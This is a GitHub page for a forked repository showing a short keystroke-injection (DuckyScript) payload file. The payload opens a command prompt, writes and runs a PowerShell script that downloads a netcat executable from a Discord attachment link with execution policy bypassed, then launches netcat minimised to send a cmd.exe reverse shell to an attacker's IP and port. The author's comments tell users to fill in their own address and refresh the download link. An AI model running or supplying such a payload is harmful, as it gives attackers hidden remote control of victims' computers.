forked from homer2320776/Netcat-Revershell-NEW
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathNetcat-Payload.txt
More file actions
19 lines (15 loc) · 807 Bytes
/
Copy pathNetcat-Payload.txt
File metadata and controls
19 lines (15 loc) · 807 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
REM Change The IP and the Port, and for the netcat download link you can use it but it sure will expired so change it (the link you need to change is the discord link if it-
REM expired if the link is still available you still can use that
REM Subscribe to my YouTube channel https://www.youtube.com/channel/UCL5HhLmJ7gSkf9zQu39LRoQ (dont really post anything related to this tho xD)
REM for the ip address and the port pls do remove this symbol (<>)
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING cd / & mkdir win & cd win & echo (wget 'https://cdn.discordapp.com/attachments/823520101415911464/826813046500491264/nc64.exe' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 3000
STRING START /MIN a.exe <IP ADDRESS> <PORT> -e cmd.exe -d & exit
ENTER